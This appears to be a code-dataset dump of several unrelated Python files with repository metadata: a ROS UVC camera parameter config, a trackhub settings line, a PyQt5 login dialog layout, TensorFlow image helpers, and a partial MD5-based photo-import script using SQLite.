'/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'width', 'edit_method': '', 'default': 640, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image height.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'height', 'edit_method': '', 'default': 480, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Format of video stream from camera.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'video_mode', 'edit_method': "{'enum_description': 'Video stream format', 'enum': [{'srcline': 36, 'description': 'Use any uncompressed format', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'uncompressed', 'ctype': 'std::string', 'type': 'str', 'name': 'uncompressed'}, {'srcline': 37, 'description': 'User any compressed format', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'compressed', 'ctype': 'std::string', 'type': 'str', 'name': 'compressed'}, {'srcline': 38, 'description': 'YUYV', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'yuyv', 'ctype': 'std::string', 'type': 'str', 'name': 'yuyv'}, {'srcline': 39, 'description': 'UYVY', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'uyvy', 'ctype': 'std::string', 'type': 'str', 'name': 'uyvy'}, {'srcline': 40, 'description': 'RGB', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'rgb', 'ctype': 'std::string', 'type': 'str', 'name': 'rgb'}, {'srcline': 41, 'description': 'BGR', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'bgr', 'ctype': 'std::string', 'type': 'str', 'name': 'bgr'}, {'srcline': 42, 'description': 'MJPEG', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'mjpeg', 'ctype': 'std::string', 'type': 'str', 'name': 'mjpeg'}, {'srcline': 43, 'description': 'gray8', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'gray8', 'ctype': 'std::string', 'type': 'str', 'name': 'gray8'}]}", 'default': 'uncompressed', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Camera speed, frames per second.', 'max': 1000.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'frame_rate', 'edit_method': '', 'default': 15.0, 'level': 3, 'min': 0.1, 'type': 'double'}, {'srcline': 290, 'description': 'Method for determining the timestamp.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'timestamp_method', 'edit_method': "{'enum_description': 'Methods for determining the timestamp', 'enum': [{'srcline': 53, 'description': 'Time of publication', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'pub', 'ctype': 'std::string', 'type': 'str', 'name': 'PubTime'}, {'srcline': 54, 'description': 'Time when raw frame capture began', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'start', 'ctype': 'std::string', 'type': 'str', 'name': 'FrameStartTime'}, {'srcline': 55, 'description': 'Time when raw frame capture ended', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'stop', 'ctype': 'std::string', 'type': 'str', 'name': 'FrameStopTime'}, {'srcline': 56, 'description': 'Time when camera-to-host transfer completed', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'hostrcpt', 'ctype': 'std::string', 'type': 'str', 'name': 'HostReceiptTime'}]}", 'default': 'start', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'ROS tf frame of reference, resolved with tf_prefix unless absolute.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'frame_id', 'edit_method': '', 'default': 'camera', 'level': 0, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Path to camera calibration file.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'camera_info_url', 'edit_method': '', 'default': '', 'level': 0, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Scanning mode.', 'max': 1, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'scanning_mode', 'edit_method': "{'enum_description': 'Scanning modes', 'enum': [{'srcline': 72, 'description': '', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Interlaced'}, {'srcline': 73, 'description': '', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Progressive'}]}", 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Auto exposure mode.', 'max': 3, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_exposure', 'edit_method': "{'enum_description': 'Auto-exposure modes', 'enum': [{'srcline': 80, 'description': 'Manual exposure, manual iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Manual'}, {'srcline': 81, 'description': 'Auto exposure, auto iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Auto'}, {'srcline': 82, 'description': 'manual exposure, auto iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 2, 'ctype': 'int', 'type': 'int', 'name': 'Shutter_Priority'}, {'srcline': 83, 'description': 'auto exposure, manual iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 3, 'ctype': 'int', 'type': 'int', 'name': 'Aperture_Priority'}]}", 'default': 3, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'In auto mode or shutter priority mode, allow the device to vary frame rate.', 'max': 1, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_exposure_priority', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Length of exposure, seconds.', 'max': 10.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'exposure_absolute', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0001, 'type': 'double'}, {'srcline': 290, 'description': 'Aperture, f.', 'max': 655.35, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'iris_absolute', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Maintain focus automatically.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_focus', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Absolute focal distance, millimeters.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'focus_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Pan (clockwise), arc seconds.', 'max': 648000, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'pan_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -648000, 'type': 'int'}, {'srcline': 290, 'description': 'Tilt (up), arc seconds.', 'max': 648000, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'tilt_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -648000, 'type': 'int'}, {'srcline': 290, 'description': 'Roll (clockwise), degrees.', 'max': 180, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'roll_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -180, 'type': 'int'}, {'srcline': 290, 'description': 'Image capture disabled.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'privacy', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Backlight compensation, device-dependent (zero for none, increasing compensation above zero).', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'backlight_compensation', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Brightness, device dependent.', 'max': 32767, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'brightness', 'edit_method': '', 'default': 0, 'level': 0, 'min': -32768, 'type': 'int'}, {'srcline': 290, 'description': 'Contrast, device dependent.', 'max': 32767, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'contrast', 'edit_method': '', 'default': 0, 'level': 0, 'min': -32768, 'type': 'int'}, {'srcline': 290, 'description': 'Gain, device dependent.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'gain', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Power line frequency anti-flicker processing.', 'max': 2, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'power_line_frequency', 'edit_method': "{'enum_description': 'Power line frequency modes', 'enum': [{'srcline': 146, 'description': 'Disabled', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Disabled'}, {'srcline': 147, 'description': '50 Hz', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Freq_50'}, {'srcline': 148, 'description': '60 Hz', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Freq_60'}]}", 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Automatic hue control.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_hue', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Hue, degrees.', 'max': 180.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'hue', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': -180.0, 'type': 'double'}, {'srcline': 290, 'description': 'Saturation, device dependent (zero for grayscale).', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'saturation', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image sharpness, device dependent.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'sharpness', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Gamma.', 'max': 5.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'gamma', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.01, 'type': 'double'}, {'srcline': 290, 'description': 'Automatic white balance.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_white_balance', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'White balance temperature, degrees.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_temperature', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Blue or U component of white balance, device-dependent.', 'max': 65536.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_BU', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Red or V component of white balance, device-dependent.', 'max': 65536.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_RV', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}], 'type': '', 'id': 0}
min = {}
max = {}
defaults = {}
level = {}
type = {}
all_level = 0
#def extract_params(config):
# params = []
# params.extend(config['parameters'])
# for group in config['groups']:
# params.extend(extract_params(group))
# return params
for param in extract_params(config_description):
min[param['name']] = param['min']
max[param['name']] = param['max']
defaults[param['name']] = param['default']
level[param['name']] = param['level']
type[param['name']] = param['type']
all_level = all_level | param['level']
UVCCamera_uncompressed = 'uncompressed'
UVCCamera_compressed = 'compressed'
UVCCamera_yuyv = 'yuyv'
UVCCamera_uyvy = 'uyvy'
UVCCamera_rgb = 'rgb'
UVCCamera_bgr = 'bgr'
UVCCamera_mjpeg = 'mjpeg'
UVCCamera_gray8 = 'gray8'
UVCCamera_PubTime = 'pub'
UVCCamera_FrameStartTime = 'start'
UVCCamera_FrameStopTime = 'stop'
UVCCamera_HostReceiptTime = 'hostrcpt'
UVCCamera_Interlaced = 0
UVCCamera_Progressive = 1
UVCCamera_Manual = 0
UVCCamera_Auto = 1
UVCCamera_Shutter_Priority = 2
UVCCamera_Aperture_Priority = 3
UVCCamera_Disabled = 0
UVCCamera_Freq_50 = 1
UVCCamera_Freq_60 = 1
| 0 | 0 | 0 |
76262c3f52cb6bdee076ea934eea9911ec7e90fe | 16 | py | Python | trackhub/settings.py | mauranolab/trackhub | ef4bc46810c370dc9422c549c34fc70e17cf5e32 | [
"MIT"
] | 36 | 2015-01-02T10:12:54.000Z | 2021-09-13T14:17:03.000Z | trackhub/settings.py | daler/trackhub | 3127aa3eb263b71ff0bea47c84aaf42aef520816 | [
"MIT"
] | 21 | 2015-01-02T11:59:20.000Z | 2021-02-19T21:30:43.000Z | trackhub/settings.py | daler/trackhub | 3127aa3eb263b71ff0bea47c84aaf42aef520816 | [
"MIT"
] | 11 | 2015-04-15T10:13:38.000Z | 2020-10-30T11:43:57.000Z | VALIDATE = True
| 8 | 15 | 0.75 | VALIDATE = True
| 0 | 0 | 0 |
3141a149e0e147fb3f5268ae3e05948ad4da7719 | 4,760 | py | Python | log-in.py | NoNameGr/NoName | e437ada090612bb44de0524affb66348537eda56 | [
"MIT"
] | null | null | null | log-in.py | NoNameGr/NoName | e437ada090612bb44de0524affb66348537eda56 | [
"MIT"
] | null | null | null | log-in.py | NoNameGr/NoName | e437ada090612bb44de0524affb66348537eda56 | [
"MIT"
] | 2 | 2020-07-30T04:10:37.000Z | 2020-07-30T04:15:10.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'log-in.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
| 44.485981 | 88 | 0.683193 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'log-in.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(399, 427)
self.label = QtWidgets.QLabel(Dialog)
self.label.setGeometry(QtCore.QRect(20, 110, 91, 31))
font = QtGui.QFont()
font.setPointSize(17)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setGeometry(QtCore.QRect(20, 150, 91, 31))
font = QtGui.QFont()
font.setPointSize(17)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.textEdit = QtWidgets.QTextEdit(Dialog)
self.textEdit.setGeometry(QtCore.QRect(120, 110, 256, 31))
self.textEdit.setObjectName("textEdit")
self.textEdit_2 = QtWidgets.QTextEdit(Dialog)
self.textEdit_2.setGeometry(QtCore.QRect(120, 150, 256, 31))
self.textEdit_2.setObjectName("textEdit_2")
self.label_3 = QtWidgets.QLabel(Dialog)
self.label_3.setGeometry(QtCore.QRect(120, 30, 191, 51))
font = QtGui.QFont()
font.setPointSize(22)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(250, 200, 121, 41))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton.setFont(font)
self.pushButton.setObjectName("pushButton")
self.commandLinkButton_2 = QtWidgets.QCommandLinkButton(Dialog)
self.commandLinkButton_2.setGeometry(QtCore.QRect(150, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton_2.setFont(font)
self.commandLinkButton_2.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton_2.setCheckable(False)
self.commandLinkButton_2.setDescription("")
self.commandLinkButton_2.setObjectName("commandLinkButton_2")
self.commandLinkButton_3 = QtWidgets.QCommandLinkButton(Dialog)
self.commandLinkButton_3.setGeometry(QtCore.QRect(280, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton_3.setFont(font)
self.commandLinkButton_3.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton_3.setCheckable(False)
self.commandLinkButton_3.setDescription("")
self.commandLinkButton_3.setObjectName("commandLinkButton_3")
self.commandLinkButton = QtWidgets.QCommandLinkButton(Dialog)
self.commandLinkButton.setGeometry(QtCore.QRect(10, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton.setFont(font)
self.commandLinkButton.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton.setCheckable(False)
self.commandLinkButton.setDescription("")
self.commandLinkButton.setObjectName("commandLinkButton")
self.label_4 = QtWidgets.QLabel(Dialog)
self.label_4.setGeometry(QtCore.QRect(100, 250, 221, 16))
self.label_4.setObjectName("label_4")
self.pushButton_2 = QtWidgets.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(130, 270, 151, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "User : "))
self.label_2.setText(_translate("Dialog", "Password : "))
self.label_3.setText(_translate("Dialog", "Đuổi hình bắt chữ "))
self.pushButton.setText(_translate("Dialog", "Log in"))
self.commandLinkButton_2.setText(_translate("Dialog", "Google"))
self.commandLinkButton_3.setText(_translate("Dialog", "Twitter"))
self.commandLinkButton.setText(_translate("Dialog", "Facebook"))
self.label_4.setText(_translate("Dialog", "Bạn chưa có tài khoản đăng nhập ? "))
self.pushButton_2.setText(_translate("Dialog", "Create free account "))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
| 4,159 | 3 | 76 |
0f7be76eca4e901701b16ef946c1cad8131f3dd7 | 978 | py | Python | data_pipeline/tf_helper.py | drah/UGATIT | 69c7f6d9887407f21c900a8bdf952e65cdcbc8a6 | [
"Apache-2.0"
] | null | null | null | data_pipeline/tf_helper.py | drah/UGATIT | 69c7f6d9887407f21c900a8bdf952e65cdcbc8a6 | [
"Apache-2.0"
] | null | null | null | data_pipeline/tf_helper.py | drah/UGATIT | 69c7f6d9887407f21c900a8bdf952e65cdcbc8a6 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
| 27.942857 | 89 | 0.696319 | import tensorflow as tf
def read_image(image_path):
content = tf.read_file(image_path)
image = tf.image.decode_image(content)
return image
def resize_images(images, dest_hw):
images = tf.cast(images, tf.float32)
if images.shape.rank == 3:
images = tf.expand_dims(images, 0)
images = _resize_images_if_need(images, dest_hw)
images = images[0]
else:
images = _resize_images_if_need(images, dest_hw)
return images
def _resize_images_if_need(images, dest_hw):
resized = tf.image.resize(images, dest_hw)
images = tf.cond(
tf.reduce_all(tf.equal(tf.shape(images)[1:3], dest_hw)),
lambda: images,
lambda: resized)
return images
def random_crop(images, dest_hw):
if len(images.shape) == 3:
images = tf.image.random_crop(images, tf.concat([dest_hw, tf.shape(images)[-1:]], 0))
else:
shape = tf.shape(images)
images = tf.image.random_crop(images, tf.concat([shape[0:], dest_hw, shape[-1:], 0]))
return images | 861 | 0 | 92 |
fe7279ff6c2685a69f9f9d759391b1e8976cada1 | 5,846 | py | Python | workflow.py | f0xd3v1lsw1ld/photoworkflow | 22397e7a474798da5f207586fbabc9b869017ef0 | [
"MIT"
] | null | null | null | workflow.py | f0xd3v1lsw1ld/photoworkflow | 22397e7a474798da5f207586fbabc9b869017ef0 | [
"MIT"
] | null | null | null | workflow.py | f0xd3v1lsw1ld/photoworkflow | 22397e7a474798da5f207586fbabc9b869017ef0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#######################################################################################################################################################################
#The MIT License (MIT)
#Copyright (c) Copyright 2016, f0xd3v1lsw1ld@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
#to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
#and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#######################################################################################################################################################################
import os
import os.path
import hashlib
import sys
import sqlite3
import argparse
import shutil
#methode to calculate md5sum of a given file
#return te md5sum as string or 0
#methode to check if a given md5sum is already in the database
#if not, it will be insert
#return True if it's in the database, False otherwise
#methode to copy given file in the given directory
#return True if successful, False if not
#main methode
#handles input parameter for file extension and temporary Working directory
#creates database, if it not exists
#main loop:
# - loop over all files with given extension
# - calc their md5sum and check if these are already in the database
# - if not, copy this files in the temporary Working directory and print the filename
if __name__ == '__main__':
main()
| 40.317241 | 167 | 0.609819 | #!/usr/bin/python
#######################################################################################################################################################################
#The MIT License (MIT)
#Copyright (c) Copyright 2016, f0xd3v1lsw1ld@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
#to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
#and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#######################################################################################################################################################################
import os
import os.path
import hashlib
import sys
import sqlite3
import argparse
import shutil
#methode to calculate md5sum of a given file
#return te md5sum as string or 0
def getMd5Sum(_file):
# init hashlib to calculate md5
md5_returned = hashlib.md5()
blocksize = 2 ** 20
try:
# Open,close, read file and calculate MD5 on its contents
with open(_file, "rb") as file_to_check:
while True:
# read contents of the file
data = file_to_check.read(blocksize)
if not data:
break
# pipe contents of the file through
md5_returned.update(data)
# return calculated md5
return str(md5_returned.hexdigest())
except IOError:
print ("Error opening " + file_name)
return 0
#methode to check if a given md5sum is already in the database
#if not, it will be insert
#return True if it's in the database, False otherwise
def inDatabase(_db_filename, _md5):
try:
with sqlite3.connect(_db_filename) as conn:
data = conn.execute("SELECT * FROM tblmd5sum WHERE md5sum == '%s'" % _md5)
result = data.fetchone()
if result is not None:
return True
else:
conn.execute("INSERT OR IGNORE INTO tblmd5sum (md5sum) VALUES(?)", (_md5,))
conn.commit()
return False
except Exception as e:
print(e)
return False
#methode to copy given file in the given directory
#return True if successful, False if not
def copyFileInWrkDir(_file, _dir):
try:
shutil.copy2(_file, _dir)
return True
except Exception as e:
print(e)
return False
#main methode
#handles input parameter for file extension and temporary Working directory
#creates database, if it not exists
#main loop:
# - loop over all files with given extension
# - calc their md5sum and check if these are already in the database
# - if not, copy this files in the temporary Working directory and print the filename
def main():
parser = argparse.ArgumentParser(description='Photo import workflow')
parser.add_argument('-t', action="store", dest='type', default="JPG", help='Select image type, i.e. JPG, CR2..')
parser.add_argument('-d', action="store", dest="dir", default=".", help='Path to temporary Working directory')
